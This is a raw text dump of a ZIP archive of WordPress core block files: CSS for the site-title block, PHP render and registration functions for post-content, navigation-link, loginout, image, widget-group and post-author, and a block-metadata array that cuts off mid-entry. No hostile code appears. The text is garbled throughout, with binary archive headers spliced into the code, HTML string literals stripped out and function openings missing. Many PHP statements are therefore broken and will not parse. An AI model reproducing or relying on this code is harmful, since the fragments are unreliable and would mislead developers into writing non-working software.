"lineHeight": true, "fontAppearance": true, "letterSpacing": true, "textTransform": true } } }, "editorStyle": "wp-block-site-title-editor", "style": "wp-block-site-title" } PK7[:6vsite-title/editor.cssnu[.wp-block-site-title__placeholder{ border:1px dashed; padding:1em 0; } .editor-styles-wrapper .wp-block-site-title a{ color:inherit; }PK7[l%%site-title/style.min.cssnu[.wp-block-site-title a{color:inherit}PK7[:6vsite-title/editor-rtl.cssnu[.wp-block-site-title__placeholder{ border:1px dashed; padding:1em 0; } .editor-styles-wrapper .wp-block-site-title a{ color:inherit; }PK7[Ai~~site-title/editor-rtl.min.cssnu[.wp-block-site-title__placeholder{border:1px dashed;padding:1em 0}.editor-styles-wrapper .wp-block-site-title a{color:inherit}PK7[bN#**site-title/style-rtl.cssnu[.wp-block-site-title a{ color:inherit; }PK7[bN#**site-title/style.cssnu[.wp-block-site-title a{ color:inherit; }PK7[bcontext['postId'] ) ) { return ''; } $post_id = $block->context['postId']; if ( isset( $seen_ids[ $post_id ] ) ) { // WP_DEBUG_DISPLAY must only be honored when WP_DEBUG. This precedent // is set in `wp_debug_mode()`. $is_debug = WP_DEBUG && WP_DEBUG_DISPLAY; return $is_debug ? // translators: Visible only in the front end, this warning takes the place of a faulty block. __( '[block rendering halted]' ) : ''; } $seen_ids[ $post_id ] = true; // When inside the main loop, we want to use queried object // so that `the_preview` for the current post can apply. // We force this behavior by omitting the third argument (post ID) from the `get_the_content`. $content = get_the_content(); // Check for nextpage to display page links for paginated posts. if ( has_block( 'core/nextpage' ) ) { $content .= wp_link_pages( array( 'echo' => 0 ) ); } /** This filter is documented in wp-includes/post-template.php */ $content = apply_filters( 'the_content', str_replace( ']]>', ']]>', $content ) ); unset( $seen_ids[ $post_id ] ); if ( empty( $content ) ) { return ''; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => 'entry-content' ) ); return ( '
    ' . $content . '
    ' ); } /** * Registers the `core/post-content` block on the server. */ function register_block_core_post_content() { register_block_type_from_metadata( __DIR__ . '/post-content', array( 'render_callback' => 'render_block_core_post_content', ) ); } add_action( 'init', 'register_block_core_post_content' ); PK7[..navigation-link.phpnu[ array(), 'inline_styles' => '', ); // Text color. $named_text_color = null; $custom_text_color = null; if ( $is_sub_menu && array_key_exists( 'customOverlayTextColor', $context ) ) { $custom_text_color = $context['customOverlayTextColor']; } elseif ( $is_sub_menu && array_key_exists( 'overlayTextColor', $context ) ) { $named_text_color = $context['overlayTextColor']; } elseif ( array_key_exists( 'customTextColor', $context ) ) { $custom_text_color = $context['customTextColor']; } elseif ( array_key_exists( 'textColor', $context ) ) { $named_text_color = $context['textColor']; } elseif ( isset( $context['style']['color']['text'] ) ) { $custom_text_color = $context['style']['color']['text']; } // If has text color. if ( ! is_null( $named_text_color ) ) { // Add the color class. array_push( $colors['css_classes'], 'has-text-color', sprintf( 'has-%s-color', $named_text_color ) ); } elseif ( ! is_null( $custom_text_color ) ) { // Add the custom color inline style. $colors['css_classes'][] = 'has-text-color'; $colors['inline_styles'] .= sprintf( 'color: %s;', $custom_text_color ); } // Background color. $named_background_color = null; $custom_background_color = null; if ( $is_sub_menu && array_key_exists( 'customOverlayBackgroundColor', $context ) ) { $custom_background_color = $context['customOverlayBackgroundColor']; } elseif ( $is_sub_menu && array_key_exists( 'overlayBackgroundColor', $context ) ) { $named_background_color = $context['overlayBackgroundColor']; } elseif ( array_key_exists( 'customBackgroundColor', $context ) ) { $custom_background_color = $context['customBackgroundColor']; } elseif ( array_key_exists( 'backgroundColor', $context ) ) { $named_background_color = $context['backgroundColor']; } elseif ( isset( $context['style']['color']['background'] ) ) { $custom_background_color = $context['style']['color']['background']; } // If has background color. if ( ! is_null( $named_background_color ) ) { // Add the background-color class. array_push( $colors['css_classes'], 'has-background', sprintf( 'has-%s-background-color', $named_background_color ) ); } elseif ( ! is_null( $custom_background_color ) ) { // Add the custom background-color inline style. $colors['css_classes'][] = 'has-background'; $colors['inline_styles'] .= sprintf( 'background-color: %s;', $custom_background_color ); } return $colors; } /** * Build an array with CSS classes and inline styles defining the font sizes * which will be applied to the navigation markup in the front-end. * * @param array $context Navigation block context. * @return array Font size CSS classes and inline styles. */ function block_core_navigation_link_build_css_font_sizes( $context ) { // CSS classes. $font_sizes = array( 'css_classes' => array(), 'inline_styles' => '', ); $has_named_font_size = array_key_exists( 'fontSize', $context ); $has_custom_font_size = isset( $context['style']['typography']['fontSize'] ); if ( $has_named_font_size ) { // Add the font size class. $font_sizes['css_classes'][] = sprintf( 'has-%s-font-size', $context['fontSize'] ); } elseif ( $has_custom_font_size ) { // Add the custom font size inline style. $font_sizes['inline_styles'] = sprintf( 'font-size: %s;', wp_get_typography_font_size_value( array( 'size' => $context['style']['typography']['fontSize'], ) ) ); } return $font_sizes; } /** * Returns the top-level submenu SVG chevron icon. * * @return string */ function block_core_navigation_link_render_submenu_icon() { return ''; } /** * Decodes a url if it's encoded, returning the same url if not. * * @param string $url The url to decode. * * @return string $url Returns the decoded url. */ function block_core_navigation_link_maybe_urldecode( $url ) { $is_url_encoded = false; $query = parse_url( $url, PHP_URL_QUERY ); $query_params = wp_parse_args( $query ); foreach ( $query_params as $query_param ) { if ( rawurldecode( $query_param ) !== $query_param ) { $is_url_encoded = true; break; } } if ( $is_url_encoded ) { return rawurldecode( $url ); } return $url; } /** * Renders the `core/navigation-link` block. * * @param array $attributes The block attributes. * @param string $content The saved content. * @param WP_Block $block The parsed block. * * @return string Returns the post content with the legacy widget added. */ function render_block_core_navigation_link( $attributes, $content, $block ) { $navigation_link_has_id = isset( $attributes['id'] ) && is_numeric( $attributes['id'] ); $is_post_type = isset( $attributes['kind'] ) && 'post-type' === $attributes['kind']; $is_post_type = $is_post_type || isset( $attributes['type'] ) && ( 'post' === $attributes['type'] || 'page' === $attributes['type'] ); // Don't render the block's subtree if it is a draft or if the ID does not exist. if ( $is_post_type && $navigation_link_has_id ) { $post = get_post( $attributes['id'] ); if ( ! $post || 'publish' !== $post->post_status ) { return ''; } } // Don't render the block's subtree if it has no label. if ( empty( $attributes['label'] ) ) { return ''; } $font_sizes = block_core_navigation_link_build_css_font_sizes( $block->context ); $classes = array_merge( $font_sizes['css_classes'] ); $style_attribute = $font_sizes['inline_styles']; $css_classes = trim( implode( ' ', $classes ) ); $has_submenu = count( $block->inner_blocks ) > 0; $kind = empty( $attributes['kind'] ) ? 'post_type' : str_replace( '-', '_', $attributes['kind'] ); $is_active = ! empty( $attributes['id'] ) && get_queried_object_id() === (int) $attributes['id'] && ! empty( get_queried_object()->$kind ); $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $css_classes . ' wp-block-navigation-item' . ( $has_submenu ? ' has-child' : '' ) . ( $is_active ? ' current-menu-item' : '' ), 'style' => $style_attribute, ) ); $html = '
  • ' . ''; if ( isset( $attributes['label'] ) ) { $html .= wp_kses_post( $attributes['label'] ); } $html .= ''; // Add description if available. if ( ! empty( $attributes['description'] ) ) { $html .= ''; $html .= wp_kses_post( $attributes['description'] ); $html .= ''; } $html .= ''; // End anchor tag content. if ( isset( $block->context['showSubmenuIcon'] ) && $block->context['showSubmenuIcon'] && $has_submenu ) { // The submenu icon can be hidden by a CSS rule on the Navigation Block. $html .= '' . block_core_navigation_link_render_submenu_icon() . ''; } if ( $has_submenu ) { $inner_blocks_html = ''; foreach ( $block->inner_blocks as $inner_block ) { $inner_blocks_html .= $inner_block->render(); } $html .= sprintf( '
      %s
    ', $inner_blocks_html ); } $html .= '
  • '; return $html; } /** * Returns a navigation link variation * * @param WP_Taxonomy|WP_Post_Type $entity post type or taxonomy entity. * @param string $kind string of value 'taxonomy' or 'post-type'. * * @return array */ function build_variation_for_navigation_link( $entity, $kind ) { $title = ''; $description = ''; if ( property_exists( $entity->labels, 'item_link' ) ) { $title = $entity->labels->item_link; } if ( property_exists( $entity->labels, 'item_link_description' ) ) { $description = $entity->labels->item_link_description; } $variation = array( 'name' => $entity->name, 'title' => $title, 'description' => $description, 'attributes' => array( 'type' => $entity->name, 'kind' => $kind, ), ); // Tweak some value for the variations. $variation_overrides = array( 'post_tag' => array( 'name' => 'tag', 'attributes' => array( 'type' => 'tag', 'kind' => $kind, ), ), 'post_format' => array( // The item_link and item_link_description for post formats is the // same as for tags, so need to be overridden. 'title' => __( 'Post Format Link' ), 'description' => __( 'A link to a post format' ), 'attributes' => array( 'type' => 'post_format', 'kind' => $kind, ), ), ); if ( array_key_exists( $entity->name, $variation_overrides ) ) { $variation = array_merge( $variation, $variation_overrides[ $entity->name ] ); } return $variation; } /** * Register the navigation link block. * * @uses render_block_core_navigation() * @throws WP_Error An WP_Error exception parsing the block definition. */ function register_block_core_navigation_link() { $post_types = get_post_types( array( 'show_in_nav_menus' => true ), 'objects' ); $taxonomies = get_taxonomies( array( 'show_in_nav_menus' => true ), 'objects' ); // Use two separate arrays as a way to order the variations in the UI. // Known variations (like Post Link and Page Link) are added to the // `built_ins` array. Variations for custom post types and taxonomies are // added to the `variations` array and will always appear after `built-ins. $built_ins = array(); $variations = array(); if ( $post_types ) { foreach ( $post_types as $post_type ) { $variation = build_variation_for_navigation_link( $post_type, 'post-type' ); if ( $post_type->_builtin ) { $built_ins[] = $variation; } else { $variations[] = $variation; } } } if ( $taxonomies ) { foreach ( $taxonomies as $taxonomy ) { $variation = build_variation_for_navigation_link( $taxonomy, 'taxonomy' ); if ( $taxonomy->_builtin ) { $built_ins[] = $variation; } else { $variations[] = $variation; } } } register_block_type_from_metadata( __DIR__ . '/navigation-link', array( 'render_callback' => 'render_block_core_navigation_link', 'variations' => array_merge( $built_ins, $variations ), ) ); } add_action( 'init', 'register_block_core_navigation_link' ); PK7[f8site-tagline.phpnu[ $align_class_name ) ); return sprintf( '

    %2$s

    ', $wrapper_attributes, $site_tagline ); } /** * Registers the `core/site-tagline` block on the server. */ function register_block_core_site_tagline() { register_block_type_from_metadata( __DIR__ . '/site-tagline', array( 'render_callback' => 'render_block_core_site_tagline', ) ); } add_action( 'init', 'register_block_core_site_tagline' ); PK7[dd loginout.phpnu[ false ) ); } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => $classes ) ); return '
    ' . $contents . '
    '; } /** * Registers the `core/loginout` block on server. */ function register_block_core_loginout() { register_block_type_from_metadata( __DIR__ . '/loginout', array( 'render_callback' => 'render_block_core_loginout', ) ); } add_action( 'init', 'register_block_core_loginout' ); PK7[Blist.phpnu[ is transformed to
      . * * @since 6.6.0 * * @see https://github.com/WordPress/gutenberg/issues/12420 * * @param array $attributes Attributes of the block being rendered. * @param string $content Content of the block being rendered. * * @return string The content of the block being rendered. */ function block_core_list_render( $attributes, $content ) { if ( ! $content ) { return $content; } $processor = new WP_HTML_Tag_Processor( $content ); $list_tags = array( 'OL', 'UL' ); while ( $processor->next_tag() ) { if ( in_array( $processor->get_tag(), $list_tags, true ) ) { $processor->add_class( 'wp-block-list' ); break; } } return $processor->get_updated_html(); } /** * Registers the `core/list` block on server. * * @since 6.6.0 */ function register_block_core_list() { register_block_type_from_metadata( __DIR__ . '/list', array( 'render_callback' => 'block_core_list_render', ) ); } add_action( 'init', 'register_block_core_list' ); PK7[   button.phpnu[` or `'; $body_content = preg_replace( '/]+>/', $button, $body_content ); // We need both a responsive image and an enlarged image to animate // the zoom seamlessly on slow internet connections; the responsive // image is a copy of the one in the body, which animates immediately // as the lightbox is opened, while the enlarged one is a full-sized // version that will likely still be loading as the animation begins. $m = new WP_HTML_Tag_Processor( $block_content ); $m->next_tag( 'figure' ); $m->add_class( 'responsive-image' ); $m->next_tag( 'img' ); // We want to set the 'src' attribute to an empty string in the responsive image // because otherwise, as of this writing, the wp_filter_content_tags() function in // WordPress will automatically add a 'srcset' attribute to the image, which will at // times cause the incorrectly sized image to be loaded in the lightbox on Firefox. // Because of this, we bind the 'src' attribute explicitly the current src to reliably // use the exact same image as in the content when the lightbox is first opened while // we wait for the larger image to load. $m->set_attribute( 'src', '' ); $m->set_attribute( 'data-wp-bind--src', 'context.core.image.imageCurrentSrc' ); $m->set_attribute( 'data-wp-style--object-fit', 'selectors.core.image.lightboxObjectFit' ); $initial_image_content = $m->get_updated_html(); $q = new WP_HTML_Tag_Processor( $block_content ); $q->next_tag( 'figure' ); $q->add_class( 'enlarged-image' ); $q->next_tag( 'img' ); // We set the 'src' attribute to an empty string to prevent the browser from loading the image // on initial page load, then bind the attribute to a selector that returns the full-sized image src when // the lightbox is opened. We could use 'loading=lazy' in combination with the 'hidden' attribute to // accomplish the same behavior, but that approach breaks progressive loading of the image in Safari // and Chrome (see https://github.com/WordPress/gutenberg/pull/52765#issuecomment-1674008151). Until that // is resolved, manually setting the 'src' seems to be the best solution to load the large image on demand. $q->set_attribute( 'src', '' ); $q->set_attribute( 'data-wp-bind--src', 'selectors.core.image.enlargedImgSrc' ); $q->set_attribute( 'data-wp-style--object-fit', 'selectors.core.image.lightboxObjectFit' ); $enlarged_image_content = $q->get_updated_html(); // If the current theme does NOT have a `theme.json`, or the colors are not defined, // we need to set the background color & close button color to some default values // because we can't get them from the Global Styles. $background_color = '#fff'; $close_button_color = '#000'; if ( wp_theme_has_theme_json() ) { $global_styles_color = wp_get_global_styles( array( 'color' ) ); if ( ! empty( $global_styles_color['background'] ) ) { $background_color = esc_attr( $global_styles_color['background'] ); } if ( ! empty( $global_styles_color['text'] ) ) { $close_button_color = esc_attr( $global_styles_color['text'] ); } } $close_button_icon = ''; $close_button_label = esc_attr__( 'Close' ); $lightbox_html = << HTML; return str_replace( '', $lightbox_html . '', $body_content ); } /** * Ensures that the view script has the `wp-interactivity` dependency. * * @since 6.4.0 * * @global WP_Scripts $wp_scripts */ function block_core_image_ensure_interactivity_dependency() { global $wp_scripts; if ( isset( $wp_scripts->registered['wp-block-image-view'] ) && ! in_array( 'wp-interactivity', $wp_scripts->registered['wp-block-image-view']->deps, true ) ) { $wp_scripts->registered['wp-block-image-view']->deps[] = 'wp-interactivity'; } } add_action( 'wp_print_scripts', 'block_core_image_ensure_interactivity_dependency' ); /** * Registers the `core/image` block on server. */ function register_block_core_image() { register_block_type_from_metadata( __DIR__ . '/image', array( 'render_callback' => 'render_block_core_image', ) ); } add_action( 'init', 'register_block_core_image' ); PK7[gvvwidget-group.phpnu['; $after_title = ''; } $html = ''; if ( ! empty( $attributes['title'] ) ) { $html .= $before_title . esc_html( $attributes['title'] ) . $after_title; } $html .= '
      '; foreach ( $block->inner_blocks as $inner_block ) { $html .= $inner_block->render(); } $html .= '
      '; return $html; } /** * Registers the 'core/widget-group' block. */ function register_block_core_widget_group() { register_block_type_from_metadata( __DIR__ . '/widget-group', array( 'render_callback' => 'render_block_core_widget_group', ) ); } add_action( 'init', 'register_block_core_widget_group' ); /** * Make a note of the sidebar being rendered before WordPress starts rendering * it. This lets us get to the current sidebar in * render_block_core_widget_group(). * * @param int|string $index Index, name, or ID of the dynamic sidebar. */ function note_sidebar_being_rendered( $index ) { global $_sidebar_being_rendered; $_sidebar_being_rendered = $index; } add_action( 'dynamic_sidebar_before', 'note_sidebar_being_rendered' ); /** * Clear whatever we set in note_sidebar_being_rendered() after WordPress * finishes rendering a sidebar. */ function discard_sidebar_being_rendered() { global $_sidebar_being_rendered; unset( $_sidebar_being_rendered ); } add_action( 'dynamic_sidebar_after', 'discard_sidebar_being_rendered' ); PK7[ϩ::comments-pagination-numbers.phpnu[context['postId'] ) ) { return ''; } $comment_vars = build_comment_query_vars_from_block( $block ); $total = ( new WP_Comment_Query( $comment_vars ) )->max_num_pages; $current = ! empty( $comment_vars['paged'] ) ? $comment_vars['paged'] : null; // Render links. $content = paginate_comments_links( array( 'total' => $total, 'current' => $current, 'prev_next' => false, 'echo' => false, ) ); if ( empty( $content ) ) { return ''; } $wrapper_attributes = get_block_wrapper_attributes(); return sprintf( '
      %2$s
      ', $wrapper_attributes, $content ); } /** * Registers the `core/comments-pagination-numbers` block on the server. */ function register_block_core_comments_pagination_numbers() { register_block_type_from_metadata( __DIR__ . '/comments-pagination-numbers', array( 'render_callback' => 'render_block_core_comments_pagination_numbers', ) ); } add_action( 'init', 'register_block_core_comments_pagination_numbers' ); PK7[  post-author.phpnu[context['postId'] ) ) { $author_id = get_query_var( 'author' ); } else { $author_id = get_post_field( 'post_author', $block->context['postId'] ); } if ( empty( $author_id ) ) { return ''; } $avatar = ! empty( $attributes['avatarSize'] ) ? get_avatar( $author_id, $attributes['avatarSize'] ) : null; $link = get_author_posts_url( $author_id ); $author_name = get_the_author_meta( 'display_name', $author_id ); if ( ! empty( $attributes['isLink'] && ! empty( $attributes['linkTarget'] ) ) ) { $author_name = sprintf( '%3$s', esc_url( $link ), esc_attr( $attributes['linkTarget'] ), $author_name ); } $byline = ! empty( $attributes['byline'] ) ? $attributes['byline'] : false; $classes = array(); if ( isset( $attributes['itemsJustification'] ) ) { $classes[] = 'items-justified-' . $attributes['itemsJustification']; } if ( isset( $attributes['textAlign'] ) ) { $classes[] = 'has-text-align-' . $attributes['textAlign']; } if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) { $classes[] = 'has-link-color'; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) ); return sprintf( '
      ', $wrapper_attributes ) . ( ! empty( $attributes['showAvatar'] ) ? '' : '' ) . '' . '
      '; } /** * Registers the `core/post-author` block on the server. */ function register_block_core_post_author() { register_block_type_from_metadata( __DIR__ . '/post-author', array( 'render_callback' => 'render_block_core_post_author', ) ); } add_action( 'init', 'register_block_core_post_author' ); PK7[2 require-static-blocks.phpnu[ array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/archives', 'title' => 'Archives', 'category' => 'widgets', 'description' => 'Display a date archive of your posts.', 'textdomain' => 'default', 'attributes' => array( 'displayAsDropdown' => array( 'type' => 'boolean', 'default' => false ), 'showLabel' => array( 'type' => 'boolean', 'default' => true ), 'showPostCounts' => array( 'type' => 'boolean', 'default' => false ), 'type' => array( 'type' => 'string', 'default' => 'monthly' ) ), 'supports' => array( 'align' => true, 'html' => false, 'spacing' => array( 'margin' => true, 'padding' => true, '__experimentalDefaultControls' => array( 'margin' => false, 'padding' => false ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-archives-editor' ), 'audio' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/audio', 'title' => 'Audio', 'category' => 'media', 'description' => 'Embed a simple audio player.', 'keywords' => array( 'music', 'sound', 'podcast', 'recording' ), 'textdomain' => 'default', 'attributes' => array( 'src' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'audio', 'attribute' => 'src', '__experimentalRole' => 'content' ), 'caption' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'figcaption', '__experimentalRole' => 'content' ), 'id' => array( 'type' => 'number', '__experimentalRole' => 'content' ), 'autoplay' => array( 'type' => 'boolean', 'source' => 'attribute', 'selector' => 'audio', 'attribute' => 'autoplay' ), 'loop' => array( 'type' => 'boolean', 'source' => 'attribute', 'selector' => 'audio', 'attribute' => 'loop' ), 'preload' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'audio', 'attribute' => 'preload' ) ), 'supports' => array( 'anchor' => true, 'align' => true, 'spacing' => array( 'margin' => true, 'padding' => true, '__experimentalDefaultControls' => array( 'margin' => false, 'padding' => false ) ) ), 'editorStyle' => 'wp-block-audio-editor', 'style' => 'wp-block-audio' ), 'avatar' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/avatar', 'title' => 'Avatar', 'category' => 'theme', 'description' => 'Add a user’s avatar.', 'textdomain' => 'default', 'attributes' => array( 'userId' => array( 'type' => 'number' ), 'size' => array( 'type' => 'number', 'default' => 96 ), 'isLink' => array( 'type' => 'boolean', 'default' => false ), 'linkTarget' => array( 'type' => 'string', 'default' => '_self' ) ), 'usesContext' => array( 'postType', 'postId', 'commentId' ), 'supports' => array( 'html' => false, 'align' => true, 'alignWide' => false, 'spacing' => array( 'margin' => true, 'padding' => true ), '__experimentalBorder' => array( '__experimentalSkipSerialization' => true, 'radius' => true, 'width' => true, 'color' => true, 'style' => true, '__experimentalDefaultControls' => array( 'radius' => true ) ), 'color' => array( 'text' => false, 'background' => false, '__experimentalDuotone' => 'img' ) ), 'selectors' => array( 'border' => '.wp-block-avatar img' ), 'editorStyle' => 'wp-block-avatar-editor', 'style' => 'wp-block-avatar' ), 'block' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/block', 'title' => 'Pattern', 'category' => 'reusable', 'description' => 'Create and save content to reuse across your site. Update the pattern, and the changes apply everywhere it’s used.', 'keywords' => array( 'reusable' ), 'textdomain' => 'default', 'attributes' => array( 'ref' => array( 'type' => 'number' ) ), 'supports' => array( 'customClassName' => false, 'html' => false, 'inserter' => false ) ), 'button' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/button', 'title' => 'Button', 'category' => 'design', 'parent' => array( 'core/buttons' ), 'description' => 'Prompt visitors to take action with a button-style link.', 'keywords' => array( 'link' ), 'textdomain' => 'default', 'attributes' => array( 'tagName' => array( 'type' => 'string', 'enum' => array( 'a', 'button' ), 'default' => 'a' ), 'type' => array( 'type' => 'string', 'default' => 'button' ), 'textAlign' => array( 'type' => 'string' ), 'url' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'a', 'attribute' => 'href', '__experimentalRole' => 'content' ), 'title' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'a,button', 'attribute' => 'title', '__experimentalRole' => 'content' ), 'text' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'a,button', '__experimentalRole' => 'content' ), 'linkTarget' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'a', 'attribute' => 'target', '__experimentalRole' => 'content' ), 'rel' => array( 'type' => 'string', 'source' => 'attribute', 'selector' => 'a', 'attribute' => 'rel', '__experimentalRole' => 'content' ), 'placeholder' => array( 'type' => 'string' ), 'backgroundColor' => array( 'type' => 'string' ), 'textColor' => array( 'type' => 'string' ), 'gradient' => array( 'type' => 'string' ), 'width' => array( 'type' => 'number' ) ), 'supports' => array( 'anchor' => true, 'align' => false, 'alignWide' => false, 'color' => array( '__experimentalSkipSerialization' => true, 'gradients' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ), 'reusable' => false, 'shadow' => true, 'spacing' => array( '__experimentalSkipSerialization' => true, 'padding' => array( 'horizontal', 'vertical' ), '__experimentalDefaultControls' => array( 'padding' => true ) ), '__experimentalBorder' => array( 'color' => true, 'radius' => true, 'style' => true, 'width' => true, '__experimentalSkipSerialization' => true, '__experimentalDefaultControls' => array( 'color' => true, 'radius' => true, 'style' => true, 'width' => true ) ), '__experimentalSelector' => '.wp-block-button .wp-block-button__link' ), 'styles' => array( array( 'name' => 'fill', 'label' => 'Fill', 'isDefault' => true ), array( 'name' => 'outline', 'label' => 'Outline' ) ), 'editorStyle' => 'wp-block-button-editor', 'style' => 'wp-block-button' ), 'buttons' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/buttons', 'title' => 'Buttons', 'category' => 'design', 'description' => 'Prompt visitors to take action with a group of button-style links.', 'keywords' => array( 'link' ), 'textdomain' => 'default', 'supports' => array( 'anchor' => true, 'align' => array( 'wide', 'full' ), 'html' => false, '__experimentalExposeControlsToChildren' => true, 'spacing' => array( 'blockGap' => true, 'margin' => array( 'top', 'bottom' ), '__experimentalDefaultControls' => array( 'blockGap' => true ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ), 'layout' => array( 'allowSwitching' => false, 'allowInheriting' => false, 'default' => array( 'type' => 'flex' ) ) ), 'editorStyle' => 'wp-block-buttons-editor', 'style' => 'wp-block-buttons' ), 'calendar' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/calendar', 'title' => 'Calendar', 'category' => 'widgets', 'description' => 'A calendar of your site’s posts.', 'keywords' => array( 'posts', 'archive' ), 'textdomain' => 'default', 'attributes' => array( 'month' => array( 'type' => 'integer' ), 'year' => array( 'type' => 'integer' ) ), 'supports' => array( 'align' => true, 'color' => array( 'link' => true, '__experimentalSkipSerialization' => array( 'text', 'background' ), '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ), '__experimentalSelector' => 'table, th' ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'style' => 'wp-block-calendar' ), 'categories' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/categories', 'title' => 'Categories List', 'category' => 'widgets', 'description' => 'Display a list of all categories.', 'textdomain' => 'default', 'attributes' => array( 'displayAsDropdown' => array( 'type' => 'boolean', 'default' => false ), 'showHierarchy' => array( 'type' => 'boolean', 'default' => false ), 'showPostCounts' => array( 'type' => 'boolean', 'default' => false ), 'showOnlyTopLevel' => array( 'type' => 'boolean', 'default' => false ), 'showEmpty' => array( 'type' => 'boolean', 'default' => false ) ), 'supports' => array( 'align' => true, 'html' => false, 'spacing' => array( 'margin' => true, 'padding' => true, '__experimentalDefaultControls' => array( 'margin' => false, 'padding' => false ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ) ), 'editorStyle' => 'wp-block-categories-editor', 'style' => 'wp-block-categories' ), 'code' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/code', 'title' => 'Code', 'category' => 'text', 'description' => 'Display code snippets that respect your spacing and tabs.', 'textdomain' => 'default', 'attributes' => array( 'content' => array( 'type' => 'string', 'source' => 'html', 'selector' => 'code', '__unstablePreserveWhiteSpace' => true ) ), 'supports' => array( 'align' => array( 'wide' ), 'anchor' => true, 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ), 'spacing' => array( 'margin' => array( 'top', 'bottom' ), 'padding' => true, '__experimentalDefaultControls' => array( 'margin' => false, 'padding' => false ) ), '__experimentalBorder' => array( 'radius' => true, 'color' => true, 'width' => true, 'style' => true, '__experimentalDefaultControls' => array( 'width' => true, 'color' => true ) ), 'color' => array( 'text' => true, 'background' => true, 'gradients' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ) ), 'style' => 'wp-block-code' ), 'column' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/column', 'title' => 'Column', 'category' => 'design', 'parent' => array( 'core/columns' ), 'description' => 'A single column within a columns block.', 'textdomain' => 'default', 'attributes' => array( 'verticalAlignment' => array( 'type' => 'string' ), 'width' => array( 'type' => 'string' ), 'allowedBlocks' => array( 'type' => 'array' ), 'templateLock' => array( 'type' => array( 'string', 'boolean' ), 'enum' => array( 'all', 'insert', 'contentOnly', false ) ) ), 'supports' => array( '__experimentalOnEnter' => true, 'anchor' => true, 'reusable' => false, 'html' => false, 'color' => array( 'gradients' => true, 'heading' => true, 'button' => true, 'link' => true, '__experimentalDefaultControls' => array( 'background' => true, 'text' => true ) ), 'spacing' => array( 'blockGap' => true, 'padding' => true, '__experimentalDefaultControls' => array( 'padding' => true, 'blockGap' => true ) ), '__experimentalBorder' => array( 'color' => true, 'style' => true, 'width' => true, '__experimentalDefaultControls' => array( 'color' => true, 'style' => true, 'width' => true ) ), 'typography' => array( 'fontSize' => true, 'lineHeight' => true, '__experimentalFontFamily' => true, '__experimentalFontWeight' => true, '__experimentalFontStyle' => true, '__experimentalTextTransform' => true, '__experimentalTextDecoration' => true, '__experimentalLetterSpacing' => true, '__experimentalDefaultControls' => array( 'fontSize' => true ) ), 'layout' => true ) ), 'columns' => array( '$schema' => 'https://schemas.wp.org/trunk/block.json', 'apiVersion' => 3, 'name' => 'core/columns', 'title' => 'Columns', 'category' => 'design', 'description' => 'Display content in multiple columns, with blocks added to each column.', 'textdomain' => 'default', 'attributes' => array( 'verticalAlignment' => array( 'type' => 'string' ), 'isStackedOnMobile' => array( 'type' => 'boolean', 'default' => true ), 'templateLock' => array( 'type' => array( 'string', 'boolean' ), 'enum' => array( 'all', 'insert', 'contentOnly', false ) ) ), 'supports' => array( 'anchor' => true, 'align' => array( 'wide', 'full' ), 'html' => false, 'color' => array( 'gradients' => 